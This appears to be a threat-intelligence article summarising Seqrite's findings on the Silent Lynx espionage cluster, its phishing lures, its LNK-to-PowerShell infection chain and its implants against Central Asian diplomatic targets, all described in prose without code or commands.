Silent Lynx is a sophisticated threat cluster first observed in 2024 that continues to run targeted intelligence-gathering operations against government organizations across Central Asia. Security researchers at Seqrite are credited with assigning the “Silent Lynx” label to this activity cluster, helping to separate it from a tangle of other labels that have been used by various vendors and observers, including names such as YoroTrooper, Sturgeon Phisher, and ShadowSilk. This naming clarity has assisted analysts in correlating activity and differentiating it from overlapping campaigns.

The group has built a reputation for carefully tailored spear-phishing campaigns that impersonate officials and other trusted figures. Attack messages are typically aimed at government employees and include weaponized attachments whose purpose is the collection of sensitive information.

Seqrite’s reporting highlights that the threat actors often rely on fabricated communications about high-level summits and diplomatic meetings as the initial lure, making the messages look timely and relevant to their targets.

Researchers observed that many of Silent Lynx’s operations appear to be assembled quickly and pragmatically, yet they remain narrowly focused on diplomatic and governmental personnel connected to international meetings. This pattern suggests the campaigns prioritize speed and contextual believability to increase the likelihood of engagement from busy officials.

The targeting spans multiple Central Asian countries — Seqrite specifically mentions Tajikistan and Azerbaijan — and also includes activity affecting systems in Russia and China where relevant diplomatic and infrastructure relationships intersect.

Seqrite identified two separate campaigns during 2025 that shared common techniques and tooling but targeted different geopolitical relationships. One campaign, discovered in October 2025, focused on diplomatic entities engaged in preparations for a Russia–Azerbaijan summit.

The other campaign targeted organizations tied to China–Central Asia relations. Taken together, the timing, subject matter, and consistency of the lures indicate a coordinated espionage effort motivated by geopolitical intelligence objectives rather than by financial gain.

The initial infection vector typically begins with a compressed RAR archive crafted to look innocuous and relevant to the intended recipients. Filenames are often written in Russian and designed to appear as benign documents, for example using titles that translate to “Plan for Development of Strategic Cooperation.”

When recipients extract the archive, they find a malicious Windows shortcut (LNK) file rather than a native document, and that shortcut abuses PowerShell to retrieve and run obfuscated scripts hosted in public GitHub repositories.

Technical analysis of the LNK artifacts revealed working-directory metadata that pointed to a desktop path in Russian (C:\Users\GoBus\OneDrive\Рабочий стол). Seqrite used this metadata as an investigative pivot to link multiple incidents and track the actor’s recurring infrastructure and campaign patterns.

The PowerShell code downloaded by the LNK is Base64-encoded and implements a reverse-shell capability that connects back to operator-controlled servers, typically over port 443 to blend with normal TLS traffic.

Once decoded and executed on the victim host, the payload establishes a persistent TCP-based channel to the command-and-control infrastructure. Operators issue commands which the implant executes, frequently using PowerShell’s Invoke-Expression, then the implant relays the output back across the established channel.

This interactive capability gives operators remote command execution, data collection, and the ability to stage subsequent payloads.

Seqrite’s telemetry and analysis uncovered three principal implants deployed across the campaigns. The first, dubbed Silent Loader, functions as a lightweight downloader written in C++ whose role is to fetch and stage additional components.

The second implant, Laplas, provides a TCP and TLS-capable reverse shell for resilient remote access. The third major component, SilentSweeper, is a .NET-based implant that is capable of extracting embedded PowerShell scripts from its resource section and executing them on demand.

SilentSweeper’s functionality includes accepting runtime arguments such as -extract, which writes the embedded PowerShell to disk, and -debug, a flag used for troubleshooting during deployment. Analysts noted that SilentSweeper reads a resource named qw.ps1, executes its contents, and subsequently pulls down other reverse-shell payloads to extend functionality. This modular design enables the operators to maintain a small initial footprint while delivering more capable tools as needed.

Beyond these bespoke implants, operators also deployed Ligolo-ng, an open-source tunneling utility, to create network tunnels that facilitate lateral movement and broaden remote connectivity. The presence of Ligolo-ng allowed the adversary to pivot freely and execute commands across a wider set of compromised hosts.

While the campaign demonstrates a level of operational sophistication in tooling and multi-stage delivery, Seqrite’s report also calls out a number of OPSEC mistakes — metadata artifacts, reuse of infrastructure, and predictable working-directory strings — that helped researchers attribute and cluster the activity.

Overall, the Silent Lynx campaigns represent a focused and persistent espionage program that leverages contextual social engineering, multi-stage payloads, and a mixed toolset of bespoke and open-source components to achieve long-term access to high-value diplomatic and governmental networks.

Despite the actor’s operational shortcomings that exposed clues for defenders, the combination of believable lures, modular implants, and tunneling capabilities makes this a credible threat to organizations engaged in international diplomatic and infrastructure planning.